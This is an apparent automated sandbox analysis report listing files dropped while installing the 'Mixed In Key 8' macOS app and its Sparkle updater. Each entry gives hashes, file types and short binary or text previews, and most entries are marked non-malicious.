Preview:	bplist00.................X$versionX$objectsY$archiverT$top...............#.$.*...2.=.E.g.h.i.j.k.w..................................................................... .$.'.,.-.2.6.9.B.C.J.O.P.].`.a.b.v.w.{...................................................................................................$.%.&.-.../.D.G.H.J._.}.f.b........................................................U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys.........\|.............. ...!."[NSClassName...._..SUAutomaticUpdateAlert..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSObject..+...,.-ZNS.objects.....%.&./.0\NSMutableSet../.1.)UNSSet..+...3.<..4.5.6.7.8.9.:.;...e.h.j.l.s.v.y....>.?.@.....B.C.DXNSSource]NSDestinationWNSLabel.....c.d....F.G.H.I.J.K.L.M.N.O...P.Q.R.S.T.U.V.W.X.Y.Z.[.\.].]._.`.a.b.c.d.W.f\NSWindowRect_..N

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/zh_TW.lproj/.BC.T_bKxtcb Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Apple binary property list
Category:	dropped
Size (bytes):	18080
Entropy (8bit):	6.866512672599806
Encrypted:	false
SSDEEP:	384:ilLgUpE0DeEYNg7uH4+5qRNAK6v4JmusYVBl0OyYDS63ql/pvBz1jpPr:4LgUDeEYyUK6YmOl0OZN3qlZ/pPr
MD5:	5E2245B64645FD941CD3CC5DFEA72BBE
SHA1:	BF6167784C2272E773CC8E02D6F7177AEE5975F2
SHA-256:	E7E52979E42295CF4480A3FEECE4BC8CBBDC8C375EE21DEA26A8ADB9E46F66FD
SHA-512:	E8BA9CAA08638A7EF754766C529C55DB0FFF0C5689AAD2BFB24A250C5BCA35AEFF04FFA5280D9C03B21CB7C99A6895E9257D1C773B54834E7A9D784440655737
Malicious:	false
Preview:	bplist00.................X$versionX$objectsY$archiverT$top................#.$....2.E.M.a.j.k.{.\|.......................................................................7.=.M.Q.z.{.........................................................................$.%..,./.8.9.@.A.B.C.F.G.L.M.R.r.s.t.u...................................................................................$.*.+.,./.2.5.6.8.9.:.;.<.?.@.E.F.J.O.P.U.V.b.c.d.e.l.m.n.q.u.\|...............................................x.`.........................................@.s._...e..............................................................................................U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys......................... ...!."[NSClassName...._..SUUpdatePermissionPrompt..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSObj

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/zh_TW.lproj/.BC.T_dP4Gwo Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Little-endian UTF-16 Unicode text
Category:	dropped
Size (bytes):	4694
Entropy (8bit):	4.358426012806943
Encrypted:	false
SSDEEP:	96:M430t+3g93TiDeLsSsS2SDSs7m3g1ny0G6qUvX6EN:MGQ3TG8S3Iny0WQ
MD5:	6E9B194285CA2C3B4B073E71F042F363
SHA1:	6E4C08CF83812B0B6692EDA109D8C40B7854098A
SHA-256:	494094315197DDE9A23EEE12F9556C05ED24BD82BD30323D08D807D712B8267C
SHA-512:	31993427620D3D3E484E7DCE061FFE6048C5C0812EFBB0D793017F9E5D10380B9D5FA18E90F9C53D8B0CA6CE56BCB09DC035BF87F8F541E174AC666175782CE4
Malicious:	false
Preview:	..".%.1.$.@. .%.2.$.@. .h.a.s. .b.e.e.n. .d.o.w.n.l.o.a.d.e.d. .a.n.d. .i.s. .r.e.a.d.y. .t.o. .u.s.e.!. .W.o.u.l.d. .y.o.u. .l.i.k.e. .t.o. .i.n.s.t.a.l.l. .i.t. .a.n.d. .r.e.l.a.u.n.c.h. .%.1.$.@. .n.o.w.?.". .=. .".%.1.$.@. .%.2.$.@. ..].N...N.S.O.O(u...`/f&T...s(W.[.&N..e_U.R%.1.$.@...".;.....".%.1.$.@. .c.a.n.'.t. .b.e. .u.p.d.a.t.e.d. .w.h.e.n. .i.t.'.s. .r.u.n.n.i.n.g. .f.r.o.m. .a. .r.e.a.d.-.o.n.l.y. .v.o.l.u.m.e. .l.i.k.e. .a. .d.i.s.k. .i.m.a.g.e. .o.r. .a.n. .o.p.t.i.c.a.l. .d.r.i.v.e... .M.o.v.e. .%.1.$.@. .t.o. .y.o.u.r. .A.p.p.l.i.c.a.t.i.o.n.s. .f.o.l.d.e.r.,. .r.e.l.a.u.n.c.h. .i.t. .f.r.o.m. .t.h.e.r.e.,. .a.n.d. .t.r.y. .a.g.a.i.n...". .=. .".vu .%.1.$.@. .ck._/U..wS.[...Y.x.x f.P.j.bIQ.x_j...WL.Bf..!q.l2.L..f.e.0..\ .%.1.$.@. ..y.`.v. .a(u.z._. .jHh>Y..._r.U...e_U.R..6q._.Qf..N!k.0 . .".;.....".%.@. .%.@. .i.s. .c.u.r.r.e.n.t.l.y. .t.h.e. .n.e.w.e.s.t. .v.e.r.s.i.o.n. .a.v.a.i.l.a.b.l.e...". .=. .".%.1.$.@. .%.2.$.@. ..]/f.vMR.g.e.vHr,g.0".;.....".%.@. .%.@. .

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/_CodeSignature/.BC.T_OggPHU Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	69143
Entropy (8bit):	5.1786266078313945
Encrypted:	false
SSDEEP:	384:qFau2RBBXeaOYWS/ll4Fqa8QQ4CGTPYe76NCiAye9Dzd:Gazj/g4OTDQa9Dzd
MD5:	374DF1C3E1CF9CB2EA6116BC1513EAAC
SHA1:	7ACF8F80812CE065DB88B68393BA10FD64D175C2
SHA-256:	77438F2AA469BE3D2A07EE1A2A96FC92EAB87AC85B73A5F92B14F5BC07CDC732
SHA-512:	C076F18CCAEBACC15664AB5001BF1C9017E02FAD10F436EF57A367378AFB9A8BEAAA5EDFB414700440ECFE209CDAF5D139FE4C5B8A2980AC2703C82C7A357FE1
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8"?>.<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">.<plist version="1.0">.<dict>..<key>files</key>..<dict>...<key>Resources/Autoupdate.app/Contents/Info.plist</key>...<data>...O92EYJpsmyRV92gaoHI05SUu4Yw=...</data>...<key>Resources/Autoupdate.app/Contents/MacOS/Autoupdate</key>...<data>...pLw/qUlQfkua1xZ8CEAEwH4oGqM=...</data>...<key>Resources/Autoupdate.app/Contents/PkgInfo</key>...<data>...n57qDP4tZfLD1rCS43W0B4LQjzE=...</data>...<key>Resources/Autoupdate.app/Contents/Resources/SUStatus.nib</key>...<data>...sYsx+yJdk7U5jlaT5UjkYAO2vYY=...</data>...<key>Resources/Autoupdate.app/Contents/Resources/Sparkle.icns</key>...<data>...RAPi1GDm7RjA+JlOSVD1eYK+1VA=...</data>...<key>Resources/Autoupdate.app/Contents/Resources/ar.lproj/Sparkle.strings</key>...<dict>....<key>hash</key>....<data>....3lN5msMrnMK9Fubf02YF5yyKp7U=....</data>....<key>optional</key>....<true/>...</dict>...<key>Resources/Autoupdate.a

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Resources/.BC.T_xdyGqM Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	XML 1.0 document, UTF-8 Unicode text
Category:	dropped
Size (bytes):	1339
Entropy (8bit):	5.223322615990858
Encrypted:	false
SSDEEP:	24:2dfyiwBVw6w433Ma6H42Rw0gp/sH2PgCGexwMZhGt0G+u:cfyfVQ433cHjO0giH2ICGcwcGt0G+u
MD5:	CA1EB7CC41599164BE8E346458F732E8
SHA1:	7882999B1DEFD773668B87A364D1844A731F2F60
SHA-256:	CD377A165AB4CB5909B5EBA7329E88EDB05278FB70C1550BAC4AB70499802E77
SHA-512:	EA22401F4169C1C9AA3E675DC9CAB208F5A992ADD6AE14E26011473B63FA7AF8A9B4A136501AC2EB4FFBE7F25D2A2E441CC29003BF94773EC642FEE6E831F6C7
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8"?>.<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">.<plist version="1.0">.<dict>..<key>BuildMachineOSBuild</key>..<string>18G95</string>..<key>CFBundleDevelopmentRegion</key>..<string>en</string>..<key>CFBundleExecutable</key>..<string>MIKUpdate</string>..<key>CFBundleIdentifier</key>..<string>com.mixedinkey.MIKUpdate</string>..<key>CFBundleInfoDictionaryVersion</key>..<string>6.0</string>..<key>CFBundleName</key>..<string>MIKUpdate</string>..<key>CFBundlePackageType</key>..<string>FMWK</string>..<key>CFBundleShortVersionString</key>..<string>1.0</string>..<key>CFBundleSignature</key>..<string>????</string>..<key>CFBundleSupportedPlatforms</key>..<array>...<string>MacOSX</string>..</array>..<key>CFBundleVersion</key>..<string>1</string>..<key>DTCompiler</key>..<string>com.apple.compilers.llvm.clang.1_0</string>..<key>DTPlatformBuild</key>..<string>9F2000</string>..<key>DTPlatformVersion</key>..<st

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/.BC.T_M1s3Y5 Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1449
Entropy (8bit):	5.1643819237088024
Encrypted:	false
SSDEEP:	24:2dfyiwBVw6NlAO00AO0Ma6EAO04QoRw0gp/sH2PgCGexwMZhGt0GOeb:cfyfVtlAn0AncEAnxoO0giH2ICGcwcGt
MD5:	3B5D2964FDEF83DEE7D46AF524DF419E
SHA1:	AC1F3B64170E58E9D48B102449E9BA1BB2A94938
SHA-256:	A47B28BDD0152C69BD257B13335F3EB32D52C0F297FDFE8B8365A8095C132CD2
SHA-512:	9E26F3EC522BDD128B3DB0A2E08D99FD0E209A2A918EE8D7608FCC9889522A0ED85857AB7BA90F4218A8A7991D098FF071D5C7A7A09CD8A1A8B3645D5FC2E618
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8"?>.<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">.<plist version="1.0">.<dict>..<key>BuildMachineOSBuild</key>..<string>18G95</string>..<key>CFBundleDevelopmentRegion</key>..<string>English</string>..<key>CFBundleExecutable</key>..<string>com.andymatuschak.Sparkle.SandboxService</string>..<key>CFBundleIdentifier</key>..<string>com.andymatuschak.Sparkle.SandboxService</string>..<key>CFBundleInfoDictionaryVersion</key>..<string>6.0</string>..<key>CFBundleName</key>..<string>com.andymatuschak.Sparkle.SandboxService</string>..<key>CFBundlePackageType</key>..<string>XPC!</string>..<key>CFBundleShortVersionString</key>..<string>1.0</string>..<key>CFBundleSignature</key>..<string>????</string>..<key>CFBundleSupportedPlatforms</key>..<array>...<string>MacOSX</string>..</array>..<key>CFBundleVersion</key>..<string>1</string>..<key>DTCompiler</key>..<string>com.apple.compilers.llvm.clang.1_0</string>..<ke

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/MacOS/.BC.T_F9azqT Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Mach-O 64-bit x86_64 executable, flags:<NOUNDEFS\|DYLDLINK\|TWOLEVEL\|PIE>
Category:	dropped
Size (bytes):	100000
Entropy (8bit):	5.477463069028685
Encrypted:	false
SSDEEP:	768:62GOQ89ma4SwSqkOrjeYnlrnQrIk5tijYiEPJAXIbIEI6ICyG3F3JQI24AgAkAOe:uOQa3w9jrK40DiUJXh1ZQjkIK
MD5:	3E296F6B3846792467DDCD65B94A84D7
SHA1:	3EC458CAEE7CF10192CAACB842BACEB2E1C006CB
SHA-256:	01EF7E4C14AE726A0D82BCC956558983E1C1D53AC9B8C119306A0685D54BA66E
SHA-512:	26D33DA5408B5966A186F5D8B37968D0883532F52E11A63B73F52734592DC8E0DCBCDE1EC5BD382606AB664371A0CCEF007F25C4A9D5BFB59FC9D31246F3EE8C
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: Mixed In Key 8.dmg, Detection: malicious, Browse
Preview:	....................h..... .........H...__PAGEZERO..............................................................__TEXT..........................................................__text..........__TEXT...................O......................................__stubs.........__TEXT...........b...............b..............................__stub_helper...__TEXT...........d......X........d..............................__gcc_except_tab__TEXT..........\g..............\g..............................__objc_methname.__TEXT...........g...............g..............................__cstring.......__TEXT..........ps..............ps..............................__objc_classname__TEXT..........c}..............c}..............................__objc_methtype.__TEXT...........}...............}..............................__const.........__TEXT...........~...............~..............................__unwind_info...__TEXT..................<.......................................__eh_frame......__TEXT..

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/.BC.T_67hLCP Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1514
Entropy (8bit):	5.131381869858746
Encrypted:	false
SSDEEP:	24:2dfyiwBVw6NuXbj0Ma64oR60gp/g2PgCGexwMZhGt0G9H/fedFHrGuh:cfyfVtuXbj0c1M0gy2ICGcwcGt0G9HOB
MD5:	327891A0C12C865E4533B1468092F6C8
SHA1:	3BDD84609A6C9B2455F7681AA07234E5252EE18C
SHA-256:	E092DCAA8DCDABA9ACDC861F77F1C2C252055B8BDA3B120A76AE0891395D5BF8
SHA-512:	7103096A1639BABD99F0DC2BFE13898C20417C4EEC548B95CCC2B6103188B9E8624C6D96ACBD409079821467EE8F68AF2FC80A2EBFB9C325FE5589E64FCA1F4B
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8"?>.<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">.<plist version="1.0">.<dict>..<key>BuildMachineOSBuild</key>..<string>18G95</string>..<key>CFBundleDevelopmentRegion</key>..<string>English</string>..<key>CFBundleExecutable</key>..<string>Autoupdate</string>..<key>CFBundleIconFile</key>..<string>Sparkle</string>..<key>CFBundleIdentifier</key>..<string>org.andymatuschak.sparkle.Autoupdate</string>..<key>CFBundleInfoDictionaryVersion</key>..<string>6.0</string>..<key>CFBundlePackageType</key>..<string>APPL</string>..<key>CFBundleShortVersionString</key>..<string>1.6</string>..<key>CFBundleSignature</key>..<string>????</string>..<key>CFBundleSupportedPlatforms</key>..<array>...<string>MacOSX</string>..</array>..<key>CFBundleVersion</key>..<string>1.6</string>..<key>DTCompiler</key>..<string>com.apple.compilers.llvm.clang.1_0</string>..<key>DTPlatformBuild</key>..<string>9F2000</string>..<key>DTPlat

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/.BC.T_Eq8iGJ Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	8
Entropy (8bit):	1.75
Encrypted:	false
SSDEEP:	3:k0Ra:f8
MD5:	23B7D7D024ABB0F558420E098800BF27
SHA1:	9F9EEA0CFE2D65F2C3D6B092E375B40782D08F31
SHA-256:	82502191C9484B04D685374F9879A0066069C49B8ACAE7A04B01D38D07E8ECA0
SHA-512:	F77D501528DD0CED155C80406CFBEE38D5D3649B64D2A9324F3D6CEE39491EB8F54CDEBAE49C6E21A20D2309D8FAE1B01C41631224811E73483DB25A2695738C
Malicious:	false
Preview:	APPL????

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/MacOS/.BC.T_nca4zE Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Mach-O 64-bit x86_64 executable, flags:<NOUNDEFS\|DYLDLINK\|TWOLEVEL\|PIE>
Category:	dropped
Size (bytes):	99348
Entropy (8bit):	5.45642914306039
Encrypted:	false
SSDEEP:	1536:M82/KMQUj+0Wz3FMghOmYpSymhy2i5LvgOV9ZZ3/X4W:M8waRFTO50hy2i5LIOV9ZZB
MD5:	8245D6DB0EB9AC156D8A62AD7F7ACEC1
SHA1:	3EEB772BEDA6556704D9E5CF4C902AC03EEA80B7
SHA-256:	CC53079A1A7E6D50F713DD3445CC8E646BC7DA12153CF34A6D518A7EF82911BF
SHA-512:	19F6912B279745A70F175B218B94AA885163E2DF90C991D352F4882E3A93282BB24F4165704B3C052D58F7A1504319DD4A304BDAB884D9C4CB6DDF1EB004ABC0
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	.......................... .........H...__PAGEZERO..............................................................__TEXT..........................................................__text..........__TEXT..........@.......Vw......@...............................__stubs.........__TEXT..................4.......................................__stub_helper...__TEXT........................................................__const.........__TEXT..................@.......................................__objc_methname.__TEXT.................#......................................__cstring.......__TEXT........................................................__objc_classname__TEXT..........................................................__objc_methtype.__TEXT..........................................................__gcc_except_tab__TEXT..........................................................__unwind_info...__TEXT..........l...............l...............................__eh_frame......__TEXT..

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/.BC.T_p4iFRH Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Apple binary property list
Category:	dropped
Size (bytes):	11630
Entropy (8bit):	6.73082339431031
Encrypted:	false
SSDEEP:	192:S1WHfgv3Pl0k6OXkE0lbjeEYNMtKwEgI3Bp/XOdHyuu8uMwkB32Bp1:SgHfafl0k6akE05eEYNg7EgI3BpmdHy/
MD5:	984722CB755E148570586FF148177FE8
SHA1:	B18B31FB225D93B5398E5693E548E46003B6BD86
SHA-256:	C5E5602B154E2A0AE88B5885DBBBD4F678F1CB2CE26E1049720C13F8462AEFEA
SHA-512:	25D7510BD8F2B184CD6B7E9EEA3780F544E69F662E735BDBD691D4A066207D65B9AC80879DAB3811964A6D9CB2D65357E5B526A19779A156417C449FF640BE26
Malicious:	false
Preview:	bplist00.................X$versionX$objectsY$archiverT$top...............#.$.*...2.@.H.^.f.i.m.n.o...........................................................................(.../.0.3.6.9.C.D.N.O.S.T.^._.`.i.p.t.x.\|.....................................................................................................!.".$.3.N.....f.i.j.[.k.l.m.n.o.p.q.r.s.t.u.v.w.x.y.z.{.\|.}....U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys.......~.z.............. ...!."[NSClassName...._..SUStatusController..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSObject..+...,.-ZNS.objects.....%.&./.0\NSMutableSet../.1.)UNSSet..+...3.?..4.5.6.7.8.9.:.;.<.=.>..... .[.`.g.k.o.r.t.w....A.B.C.....E.F.GXNSSource]NSDestinationWNSLabel..........I.J.K.L...M.N.O.P.Q.R.S.T.U.V.W.X.Y.Y.[.\.]VNSCellWNSFrame_..NSAllowsLogicalLayoutDirect

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/.BC.T_qT9ha5 Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Mac OS X icon, 41403 bytes, "is32" type
Category:	dropped
Size (bytes):	41403
Entropy (8bit):	7.887999665341449
Encrypted:	false
SSDEEP:	768:R4uO+MUks0YyGtGewLDcaAWSFwsmxziSjZVOupAwl/Ooc8WUK7c7WQ9tM:etLPywsuOSDmu/Ooc/pmW6tM
MD5:	80BC51F3EC405DF93F59D53264066310
SHA1:	4403E2D460E6ED18C0F8994E4950F57982BED550
SHA-256:	D3BDF012983D7F5F40414815C3AFBB35C740D6151D628E17D7BA51491B319DBE
SHA-512:	C14587C4E55D2C50F1B66AE47692A373D807C6A5EB0D2E6F5D439B979101FEF1327502A69EA0B973894D80F2DD9812C080DF1522195B99E84542E80F20325DC7
Malicious:	false
Preview:	icns....is32.......+ERRE+....+a.....e).../........./..T)............)..a....ee.....e.#....nz..zn....):.............:E.............EE............D:.......4....:#.............W..........P.. ........... ..."........."... P.....P .....098/........+ERRE+....+a.....e).../........./..T)............)..a....ee.....e.#....nz..zn....):.............:E.............EE............D:.......4....:#.............W..........P.. ........... ..."........."... P.....P .....098/........+ERRE+....+a.....e).../........./..T)............)..a....ee.....e.#....oz..zo....):.............:E.............EE............D:.......4....:#.............W..........P.. ........... ..."........."... P.....P .....098/....s8mk.................................................................................................................................................................................................................................................................il3

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/ar.lproj/.BC.T_8ctT2J Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	4602
Entropy (8bit):	5.263034756225517
Encrypted:	false
SSDEEP:	96:PQy6HaagalWRNLhuWLIEGsKSLP0VKQjAkFto4lt155Q3HaWUZP:vcaagKWRNLhnLJFL8DS4lDg35UP
MD5:	70B63D2A826BE40731A075A87C47F03F
SHA1:	DE53799AC32B9CC2BD16E6DFD36605E72C8AA7B5
SHA-256:	8C94A102BD24971BF312D36BEBC3CD67DA6328EC257CF0F59E275B2548CA4E5D
SHA-512:	AE52D660429F0891DC050467353A06403785CBDB2A0FA913A9E83463EE905E6083EBF0F042A2E2E0948DE45E55C8136F7C71E73D9C88431107B4BA3507DF8F83
Malicious:	false
Preview:	..%"$1 @2%@$h sab ee nodnwoldadea dni serda yotu es !oWlu doy uilekt onitsla ltia dnr leuacn h1%@$n wo"?= " .... .... .1%@$% $2 @..... ... ............. . ....... ..... .......... ..... .......% $1 @......;"..%"$1 @ac'n tebu dptadew eh ntis'r nuingnf or m aerdao-ln yovuleml ki e aidksi amego rnao tpcilad irev .oMev% $1 @oty uo rpAlpcitaoisnf loed,rr leuacn htif or mhtre,ea dnt yra agni".= " .... ... .......% $1 @..... .... ..... ... ........ ...... ...... .... ...... . ....... ...... ......... ......% $1 @..... ... ............ ... ......... . ....... . ....... .......;"..%" @@%i sucrrnelt yht eenewtsv reisnoa avlibael".= " ........% $2 @.... ... ........ .... ......... ..... .1%@$;"..%" @@%i son wvaiaallb-ey-uoh va e@% .oWlu doy uilekt oodnwoldai ton?w " =."... .........% $3 @.... .... .1%@$... . ....

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/ca.lproj/.BC.T_L6kSkD Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	2830
Entropy (8bit):	4.824854318221833
Encrypted:	false
SSDEEP:	48:Lctr7vlMFYvsDC9/WI9347Vut8m/bWnDQ4AildjiLk2nXjiLtRlqbaVfZgW0Db3c:LctuuUD/I1t8mjWnDQ4AId2LpnX2Ltnr
MD5:	9F1ABCCE61E95FCAE31FB24A85033AB6
SHA1:	EBFB357848D6657B8BDA738D8FF7BE1814298303
SHA-256:	60BABDFAC90136E17B9994D2A835BC95031093BA62A1C743B5F63F0A3405522F
SHA-512:	2552AF5F9B175CACABE0F2970D1B579353215D3A0E55AFFE427338F36E4B015C63EA9EFBC85386D3895F8E3EB8399644B901E39FB933EF59106400B9F0442D6A
Malicious:	false
Preview:	..%" @fo% "@= " 1%@$d e2%@$;"..%"$1 @ac'n tebu dptadew eh ntis'r nuingnf or m aidksi ameg .oMev% $1 @oty uo rpAlpcitaoisnf loed,rr leuacn hti ,na drt ygaia.n " =%"$1 @one sop tcautlatiaz ruqnaf nuicno aed s'dnud si c'dmitaeg .oMev u1%@$a lovtserd riceotirA lpcicaoisn ,erniciei-uol , iotnruea p orav-roh"..;".@%% @ah sebnei snatlldea dnw li lebr aeydt osu eentxt mi e@%s attr!sW uodly uol ki eotr leuacn hon?w " =%" @@%h aseat tnitsla..al t iseat.r .llse tep r aes rtulitiaz talp oreparv geda auq e'snici.i .@% !oVel uerniciai rra?a;"..%" @@%i sucrrnelt yht eenewtsv reisnoa avlibael".= " @%% @.. salv reis..d siopinlb e.ms.a tcau.l;"..%" @@%i son wvaiaallb ey(uoh va e@%.)W uodly uol ki eotd wolnao dtin wo"?= " @%% @se.t .idpsnobiel( ra aetin u@%.)V louea tcauilztra"?.;".@%d eo son tahevp reimssoi notw irett oht epalpcitaoi'n sidertcro!yA ery uor nuingno ffa d si kmiga?eI fon,ta ksy uo rystsmea mdnisirttarof roh le.p " =%" @ont ..p re.ms.p ree csirru elad riceotird a'lpcicaoisn !sE

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/cs.lproj/.BC.T_VX1Bq8 Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	3480
Entropy (8bit):	5.1493807547320705
Encrypted:	false
SSDEEP:	96:PgVCXD6uKrvOIS7TiAIjLhu/mLaLJOCpnfLP4dvlY95kJ79BN:pDBgvOIS7OjLhImLaLcCZLAjj79BN
MD5:	689382B6730CEFDEBD3AA07DF8B4A181
SHA1:	EC6E96BBCD6BF225F026D84B7297CEB16CAD1C16
SHA-256:	B6D274FDDD401FFC6DEE2A77AEF84562B4F50BE6BC190F287031F7335C9F8FFB
SHA-512:	0DF3228ADBCC096FE42C780FF164E65213A28E4E66F86C8064ED65CDDD49B769F9780AB48039FBEC2980A3738C428C78169FDBB98343FA08837715C56D445D02
Malicious:	false
